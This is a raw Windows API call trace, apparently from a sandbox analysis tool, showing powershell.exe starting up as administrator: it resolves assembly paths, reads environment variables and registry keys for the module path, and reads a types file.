	[0769.205] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0769.205] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0769.205] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0769.206] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0769.984] CoTaskMemAlloc (cb=0x804) returned 0x1b735610
	[0769.984] GetConsoleTitleW (in: lpConsoleTitle=0x1b735610, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0769.985] CoTaskMemFree (pv=0x1b735610) 
	[0770.539] CoTaskMemAlloc (cb=0x804) returned 0x1b736050
	[0770.539] GetConsoleTitleW (in: lpConsoleTitle=0x1b736050, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0770.540] CoTaskMemFree (pv=0x1b736050) 
	[0770.541] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0770.541] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0770.541] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0770.543] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1
	[0770.567] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d910, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0770.567] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0770.567] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0770.567] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0771.095] SetConsoleCtrlHandler (HandlerRoutine=0x2b2689c, Add=1) returned 1
	[0772.714] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x304
	[0772.716] CoCreateGuid (in: pguid=0x16df30 | out: pguid=0x16df30*(Data1=0x3f06b2be, Data2=0xd2cc, Data3=0x4158, Data4=([0]=0xb9, [1]=0xa6, [2]=0x1d, [3]=0x9f, [4]=0x43, [5]=0xd4, [6]=0xc6, [7]=0xf))) returned 0x0
	[0772.719] CoTaskMemAlloc (cb=0x104) returned 0x2b4a20
	[0772.719] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b4a20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0772.719] CoTaskMemFree (pv=0x2b4a20) 
	[0772.725] WinSqmIsOptedIn () returned 0x0
	[0772.726] CoTaskMemAlloc (cb=0x104) returned 0x2b4a20
	[0772.726] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b4a20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0772.726] CoTaskMemFree (pv=0x2b4a20) 
	[0772.727] CoTaskMemAlloc (cb=0x104) returned 0x2b4a20
	[0772.727] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b4a20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0772.727] CoTaskMemFree (pv=0x2b4a20) 
	[0772.728] CoTaskMemAlloc (cb=0x104) returned 0x2b4a20
	[0772.728] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b4a20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0772.728] CoTaskMemFree (pv=0x2b4a20) 
	[0772.729] CoTaskMemAlloc (cb=0x104) returned 0x2b4a20
	[0772.729] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b4a20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0772.729] CoTaskMemFree (pv=0x2b4a20) 
	[0772.729] CoTaskMemAlloc (cb=0x104) returned 0x2b4a20
	[0772.729] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b4a20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0772.729] CoTaskMemFree (pv=0x2b4a20) 
	[0772.731] CoTaskMemAlloc (cb=0x104) returned 0x2b4a20
	[0772.731] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b4a20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0772.731] CoTaskMemFree (pv=0x2b4a20) 
	[0772.731] CoTaskMemAlloc (cb=0x104) returned 0x2b4a20
	[0772.731] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b4a20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0772.731] CoTaskMemFree (pv=0x2b4a20) 
	[0772.732] CoTaskMemAlloc (cb=0x104) returned 0x2b4a20
	[0772.732] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b4a20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0772.732] CoTaskMemFree (pv=0x2b4a20) 
	[0774.700] CoTaskMemAlloc (cb=0x104) returned 0x2b4a20
	[0774.700] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b4a20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0774.700] CoTaskMemFree (pv=0x2b4a20) 
	[0774.705] CoTaskMemAlloc (cb=0x104) returned 0x2b4a20
	[0774.705] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b4a20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0774.705] CoTaskMemFree (pv=0x2b4a20) 
	[0774.705] CoTaskMemAlloc (cb=0x104) returned 0x2b4a20
	[0774.705] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b4a20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0774.705] CoTaskMemFree (pv=0x2b4a20) 
	[0774.706] CoTaskMemAlloc (cb=0x104) returned 0x2b4a20
	[0774.706] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b4a20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0774.706] CoTaskMemFree (pv=0x2b4a20) 
	[0779.783] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0779.783] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0779.783] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0779.783] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0788.739] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0788.739] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0788.739] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0788.740] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0788.740] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0788.740] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0788.741] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0788.741] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0788.741] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0788.742] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0788.742] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0788.742] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0788.744] CoTaskMemAlloc (cb=0x104) returned 0x2b4a20
	[0788.744] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x2b4a20, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33
	[0788.744] CoTaskMemFree (pv=0x2b4a20) 
	[0788.746] CoTaskMemAlloc (cb=0xcc) returned 0x1b732f00
	[0788.746] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b732f00, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0788.746] CoTaskMemFree (pv=0x1b732f00) 
	[0788.746] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x16daa8 | out: phkResult=0x16daa8*=0x2e4) returned 0x0
	[0788.746] RegQueryValueExW (in: hKey=0x2e4, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x16da2c, lpData=0x0, lpcbData=0x16da28*=0x0 | out: lpType=0x16da2c*=0x2, lpData=0x0, lpcbData=0x16da28*=0x6c) returned 0x0
	[0788.747] CoTaskMemAlloc (cb=0x70) returned 0x2424c0
	[0788.747] RegQueryValueExW (in: hKey=0x2e4, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x16d9fc, lpData=0x2424c0, lpcbData=0x16d9f8*=0x6c | out: lpType=0x16d9fc*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0x16d9f8*=0x6c) returned 0x0
	[0788.747] CoTaskMemFree (pv=0x2424c0) 
	[0788.747] CoTaskMemAlloc (cb=0xcc) returned 0x1b732f00
	[0788.747] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x1b732f00, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
	[0788.747] CoTaskMemFree (pv=0x1b732f00) 
	[0788.747] CoTaskMemAlloc (cb=0xcc) returned 0x1b732f00
	[0788.747] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b732f00, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0788.747] CoTaskMemFree (pv=0x1b732f00) 
	[0788.751] RegCloseKey (hKey=0x2e4) returned 0x0
	[0788.751] CoTaskMemAlloc (cb=0xcc) returned 0x1b732f00
	[0788.751] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b732f00, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0788.751] CoTaskMemFree (pv=0x1b732f00) 
	[0788.751] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x16daa8 | out: phkResult=0x16daa8*=0x2e4) returned 0x0
	[0788.751] RegQueryValueExW (in: hKey=0x2e4, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x16da2c, lpData=0x0, lpcbData=0x16da28*=0x0 | out: lpType=0x16da2c*=0x0, lpData=0x0, lpcbData=0x16da28*=0x0) returned 0x2
	[0788.751] RegCloseKey (hKey=0x2e4) returned 0x0
	[0788.756] CoTaskMemAlloc (cb=0x20c) returned 0x29f340
	[0788.756] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x29f340 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0788.757] CoTaskMemFree (pv=0x29f340) 
	[0788.757] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x16d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0788.759] SetEnvironmentVariableW (lpName="PSMODULEPATH", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 1
	[0788.763] CoTaskMemAlloc (cb=0x104) returned 0x2b4a20
	[0788.763] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b4a20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0788.764] CoTaskMemFree (pv=0x2b4a20) 
	[0788.765] CoTaskMemAlloc (cb=0x104) returned 0x2b4a20
	[0788.765] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b4a20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0788.765] CoTaskMemFree (pv=0x2b4a20) 
	[0789.717] CoTaskMemAlloc (cb=0x104) returned 0x2b4a20
	[0789.717] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b4a20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0789.717] CoTaskMemFree (pv=0x2b4a20) 
	[0789.717] CoTaskMemAlloc (cb=0x104) returned 0x2b4a20
	[0789.718] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b4a20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0789.718] CoTaskMemFree (pv=0x2b4a20) 
	[0789.719] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d898 | out: phkResult=0x16d898*=0x2ec) returned 0x0
	[0789.720] RegQueryValueExW (in: hKey=0x2ec, lpValueName="path", lpReserved=0x0, lpType=0x16d8ac, lpData=0x0, lpcbData=0x16d8a8*=0x0 | out: lpType=0x16d8ac*=0x1, lpData=0x0, lpcbData=0x16d8a8*=0x74) returned 0x0
	[0789.720] RegQueryValueExW (in: hKey=0x2ec, lpValueName="path", lpReserved=0x0, lpType=0x16d81c, lpData=0x0, lpcbData=0x16d818*=0x0 | out: lpType=0x16d81c*=0x1, lpData=0x0, lpcbData=0x16d818*=0x74) returned 0x0
	[0789.720] CoTaskMemAlloc (cb=0x78) returned 0x2424c0
	[0789.720] RegQueryValueExW (in: hKey=0x2ec, lpValueName="path", lpReserved=0x0, lpType=0x16d7ec, lpData=0x2424c0, lpcbData=0x16d7e8*=0x74 | out: lpType=0x16d7ec*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x16d7e8*=0x74) returned 0x0
	[0789.720] CoTaskMemFree (pv=0x2424c0) 
	[0789.720] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x16d560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0789.721] SetErrorMode (uMode=0x1) returned 0x1
	[0789.721] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x16d770 | out: lpFileInformation=0x16d770*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0789.721] SetErrorMode (uMode=0x1) returned 0x1
	[0789.722] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x16d560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0789.722] SetErrorMode (uMode=0x1) returned 0x1
	[0789.722] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d770 | out: lpFileInformation=0x16d770*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0789.722] SetErrorMode (uMode=0x1) returned 0x1
	[0789.725] CoTaskMemAlloc (cb=0x104) returned 0x2b4a20
	[0789.725] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b4a20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0789.725] CoTaskMemFree (pv=0x2b4a20) 
	[0789.726] CoTaskMemAlloc (cb=0x104) returned 0x2b4a20
	[0789.726] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b4a20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0789.726] CoTaskMemFree (pv=0x2b4a20) 
	[0789.732] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x16d120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0789.732] SetErrorMode (uMode=0x1) returned 0x1
	[0789.733] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x300
	[0789.733] GetFileType (hFile=0x300) returned 0x1
	[0789.733] SetErrorMode (uMode=0x1) returned 0x1
	[0789.733] GetFileType (hFile=0x300) returned 0x1
	[0789.734] ReadFile (in: hFile=0x300, lpBuffer=0x2c034e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6a8, lpOverlapped=0x0 | out: lpBuffer=0x2c034e8*, lpNumberOfBytesRead=0x16d6a8*=0x1000, lpOverlapped=0x0) returned 1
	[0789.735] ReadFile (in: hFile=0x300, lpBuffer=0x2c034e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6a8, lpOverlapped=0x0 | out: lpBuffer=0x2c034e8*, lpNumberOfBytesRead=0x16d6a8*=0x1000, lpOverlapped=0x0) returned 1
	[0789.736] ReadFile (in: hFile=0x300, lpBuffer=0x2c034e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d6a8, lpOverlapped=0x0 | out: lpBuffer=0x2c034e8*, lpNumberOfBytesRead=0x16d6a8*=0x1000, lpOverlapped=0x0) returned 1
